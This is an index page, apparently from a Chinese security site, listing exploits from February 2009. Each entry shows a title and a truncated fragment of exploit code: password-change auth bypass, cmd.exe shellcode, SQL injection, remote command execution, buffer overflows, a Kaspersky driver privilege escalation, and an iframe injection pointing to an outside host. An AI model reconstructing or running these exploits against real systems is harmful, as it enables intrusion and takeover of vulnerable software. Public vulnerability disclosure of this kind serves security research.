首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
热门关键字: shell  88888  art  vitter  linux
  当前位置:主页>安全文章>文章资料>Exploits>列表
Openfiler 2.3 (Auth Bypass) Remote Password Change Exploit
  日期:2009-02-04 10:40:48 点击:49 评论:0
#Exploit code (PoC) for OpenFiler 2.3 (current) #by just a nonroot user #http://nonroot.blogspot.com/ # import urllib,sys,re #host example: https://192.168.20.5:446/ host=raw_input(OpenFiler system ( include http and /): ) #Super admin user user='ope
win32/xp sp2 Shellcode cmd.exe 57 bytes
  日期:2009-02-04 10:39:17 点击:104 评论:0
/* win32/xp sp2 cmd.exe 57 bytes Author : Mountassif Moad Big Thnx : Houssamix :d Assembly Code : Secret Changed by : Stack Description : It is 57 Byte Shellcode which Execute Cmd.exe Tested Under Windows Xp SP2 */ #include stdlib.h #include string.h
DreamPics Photo/Video Gallery Blind SQL Injection Exploit
  日期:2009-02-04 10:38:43 点击:20 评论:0
?php ini_set(max_execution_time,0); print_r(' ############################################################################## # # DREAMPICS Photo/Video Gallery Blind SQL Injection Exploit # # ---- xoron ----- # xorontr@gmail.com # XORON (c) 2009 # # W
TxtBlog 1.0 Alpha Remote Command Execution Exploit
  日期:2009-02-04 10:37:57 点击:26 评论:0
#!/usr/bin/perl # ----------------------------------------------------------------------------- # INFORMATIONS # ----------------------------------------------------------------------------- # App = TxtBlog v 1.0 Alpha # Downl = http://downloads.sour
Hex Workshop v6 (ColorMap files .cmap) Invalid Memory Reference PoC
  日期:2009-02-04 10:37:03 点击:90 评论:0
#!/usr/bin/perl -w # Hex Workshop v6 ColorMap files .cmap Invalid Memory Reference Crash POC # Discovred by : DATA_SNIPER # for more information vist my blog:http://datasniper.arab4services.net/ # the Exploit it's very hard to implemented,if we can m
WEBalbum 2.4b (photo.php id) Blind SQL Injection Exploit
  日期:2009-02-04 10:36:17 点击:14 评论:0
?php ini_set(max_execution_time,0); print_r(' ############################################################################## # # WEBalbum v2.4b Blind SQL Injection Exploit # (Some webpages have a diffirint table name) # ---- xoron ----- # xorontr@gma
Euphonics Audio Player v1.0 (.pls) Local Buffer Overflow Exploit
  日期:2009-02-04 10:35:11 点击:25 评论:0
#!/usr/bin/perl -w #----------------------------------------------------------------------------- # Author : h4ck3r#47 # Euphonics Audio Player v1.0 (.pls) Local Buffer Overflow Exploit # Tested in Windows Pro Sp3 (English) # Gr33tz to : str0ke , T.
Free Download Manager <= 3.0 Build 844 .torrent BOF Exploit
  日期:2009-02-04 10:34:20 点击:38 评论:0
#!/usr/bin/perl # # Free Download Manager = 3.0 Build 844 .torrent BOF Exploit # ----------------------------------------------------------- # Exploit by SkD ( skdrat@hotmail.com ) # # Vendors URL = # [www.freedownloadmanager.org] # Download FDM 3.0
CMS from Scratch <= 1.9.1 (fckeditor) Remote File Upload Exploit
  日期:2009-02-03 15:39:22 点击:30 评论:0
#!/usr/bin/perl # ---------------------------------------------------------------- # CMS from Scratch = 1.9.1 (fckeditor) Remote File Upload Exploit # by yeat - staker[at]hotmail[dot]it # http://scratchwebdesignforums.com/forums/index.php?showtopic=6
KIS 2008 and Kaspersky AntiVirus for Workstations local privilege escalation exp
  日期:2009-02-03 10:05:05 点击:108 评论:0
//// Kaspersky products klim5.sys local privilege escalation //// ruben@reversemode.com #include stdafx.h #define BUFFER_SIZE4 #define MAGIC_IOCTL0x80052110 #define IMAGEBASE0x10000 BOOL FlagVulnerable = FALSE; ULONG_PTRkTrampoline; ULONG_PTRoff1,of
OpenHelpDesk 1.0.100 eval() Code Execution Exploit (meta)
  日期:2009-02-03 10:02:47 点击:29 评论:0
## # $Id: php_eval.rb 5783 2008-10-23 02:43:21Z ramon $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on l
phpslash <= 0.8.1.1 Remote Code Execution Exploit
  日期:2009-02-03 10:01:38 点击:30 评论:0
#!/usr/bin/php -q ?php # # phpslash = 0.8.1.1 Remote Code Execution Exploit # - - - - - - - - - - - - - - - - - - - - - - - - - # RCE with no special rights (guest). # No special PHP conditions required. # - - - - - - - - - - - - - - - - - - - - - -
eVision CMS 2.0 Remote Code Execution Exploit
  日期:2009-02-03 10:00:50 点击:49 评论:0
#!/usr/bin/perl # ----------------------------------------------------------------------------- # INFORMATIONS # ----------------------------------------------------------------------------- # eVision CMS 2.0 # http://kent.dl.sourceforge.net/sourcefo
CMS Mini <= 0.2.2 Remote Command Execution Exploit
  日期:2009-02-03 10:00:18 点击:42 评论:0
--+++================================================================+++-- --+++====== CMS Mini = 0.2.2 Remote Command Execution Exploit ======+++-- --+++================================================================+++-- ?php function usage () { e
phpBLASTER 1.0 RC1 (blaster_user) Blind SQL Injection Exploit
  日期:2009-02-03 09:59:19 点击:26 评论:0
--+++============================================================+++-- --+++====== phpBLASTER 1.0 RC1 Blind SQL Injection Exploit ======+++-- --+++============================================================+++-- ?php function query ($username, $pos,
RealVNC 4.1.2 (vncviewer.exe) RFB Protocol Remote Code Execution PoC
  日期:2009-02-03 09:58:29 点击:354 评论:0
#!/usr/bin/env python # POC: RealVNC 4.1.2 'vncviewer.exe' RFB Protocol Remote Code Execution Vulnerability, BID 30499 #Author: Andres Lopez Luksenberg polakocai@gmail.com # import socket serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREA
Elecard AVC HD PLAYER (m3u/xpl file) Local Stack Overflow PoC
  日期:2009-02-03 09:57:42 点击:65 评论:0
#!/usr/bin/perl #Elecard AVC HD PLAYER m3u/xpl file Local Stack Overflow POC #Found By AlpHaNiX #From NullArea.Net ########################### # proof of concept ########################### #Stack Get Overflowed Starting from 2353 char #EIP overitten
Flatnux 2009-01-27 (Job fields) XSS/Iframe Injection PoC
  日期:2009-02-03 09:56:05 点击:47 评论:0
/* - Flatnux-2009-01-27 XSS/Iframe injection p0c + 1] Create acount + 1] Go to http://localhost/~flatnux/?mod=loginop=modprofuser=[username ] - Set iframe in the Job fields (Jobless l0liframe src=http://0xc00000fdh.boo.pl/flatnux_ost.php style=visib
Small HTTP Server <= 3.05.85 Directory Traversal Exploit
  日期:2009-02-03 09:54:48 点击:57 评论:0
#!/usr/bin/perl # # Author : Houssamix # Small HTTP Server = 3.05.85 Directory Traversal Exploit # Description : Any user FTP with low permission can have access to any directory in server # Downlod : http://smallsrv.com/ # [01.01.09] Happy new year
Php168 v2008 权限提升漏洞
  日期:2009-02-02 11:13:37 点击:31 评论:0
by Ryat http://www.wolvez.org 2009-01-25 简单分析下这个漏洞 PHP代码 common.inc.php if($_SERVER['HTTP_CLIENT_IP']){ $onlineip=$_SERVER['HTTP_CLIENT_IP']; }elseif($_SERVER['HTTP_X_FORWARDED_FOR']){ $onlineip=$_SERVER['HTTP_X_FORWARDED_FOR']; }else{ $o
共637页/12733条记录 首页 上一页 [477] [478] [479] 480 [481] [482] [483] 下一页 末页
  本月热点文章
 
  本月推荐文章
 
  相关分类
  漏洞检测
  漏洞资料
  入侵实例
  系统安全
  网络安全
  网络基础
  病毒分析
Exploits
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved